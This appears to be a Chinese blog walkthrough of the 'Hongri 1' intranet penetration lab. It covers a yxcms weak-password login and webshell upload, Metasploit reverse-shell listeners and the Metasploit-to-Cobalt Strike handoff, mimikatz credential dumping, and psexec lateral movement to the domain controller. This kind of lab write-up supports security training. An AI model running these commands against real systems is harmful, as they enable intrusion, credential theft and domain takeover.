红日一(内网渗透)

目录

拓扑图

一、环境配置

二、web渗透

三、后渗透

内网信息收集

系统信息收集

域信息收集


拓扑图

一、环境配置

角色

IP地址

攻击机

192.168.8.74

win7(外网)

192.168.8.115

win7(内网)

192.168.52.143

server03

192.168.52.141

server08

192.168.52.138

二、web渗透

信息收集

主机发现

sudo netdiscover -i eth0 -r 192.168.8.0/24

端口扫描

sudo nmap -A 192.168.8.115

一级目录爆破

​压缩文件利用

下载压缩文件

查看下载文件内容,发现网站是通过yxcms搭建的

查看升级日志,确定版本号为1.2.1

推测二级目录下可能存在yxcms网站

​发现后台账密

通过弱口令登入网站后台,admin;123456

​成功拿下后台

​来到后台管理模板,上传一句话木马

​审计yxcms源代码,确定一句话木马位置

​查看一句话木马是否成功执行

​使用蚁剑进行连接

​拿到webshell

三、后渗透

使用msf生成木马进行回连

​开启监听

use exploit/mutli/handler set payload windows/meterpreter/reverse_tcp

set lhost 192.168.8.74

set lport 4444

​将木马程序通过webshell上传

执行木马

​反弹shell

内网信息收集

查看当前机器的身份

whoami

显示主机名称

hostname

显示本地管理员组

net localgroup administrators

系统信息收集

查看系统版本

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

查看系统架构

echo %PROCESSOR_ARCHITECTURE%

​查询已安装的软件及版本信息

wmic product get name,version

​查看进程及服务

tasklist /svc

域信息收集

判断是否存在域(查看主DNS)

ipconfig /all

​查看域信息

net view

​查看主域信息

net view /domain

 

查找域控

查看域控时间

net time /domain

解析DNS域服务器

nslooup god.org

ping也可以解析域名

ping god.org

 

cs配置

启动cs服务端

sudo ./teamserver 192.168.8.74 123456

​启动客户端进行连接

./cs.sh

​新建一个监听器,和msf监听ip和端口保持一致

​msf联动cs

将服务器反弹shell进行挂起

background

​msf将shell弹到cs上

use exploit/windonws/local/payload_inject #使用进程注入模块

set payload windows/meterpreter/reverse_http #windows反向http连接

set DisablePayloadHandler true #禁止产生一个新的handler set lport 4444 #监听的端口

set lhost 192.168.8.74 #配置本地ip set session 31 #迁移的会话 run

​cs上线

​cs横向探测

主机扫描net view

​视图查看存活主机

​使用hashdump抓取内存密码,mimikatz抓取注册表明文密码或ntml-hash

hashdump

​logonpasswords

​点击视图,查看凭证信息,查看相关用户的密码和ntlm-hash

​内网横移

使用smb隧道

​使用psexec通过凭证登录到其他主机

选择一个属于域的凭证信息,监听器选择smb,会话选择获取的stu1

​以上面姿势重复一遍,可以获取域控的beacon

确认域控已被拿下

查看用户权限

shell whoami

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值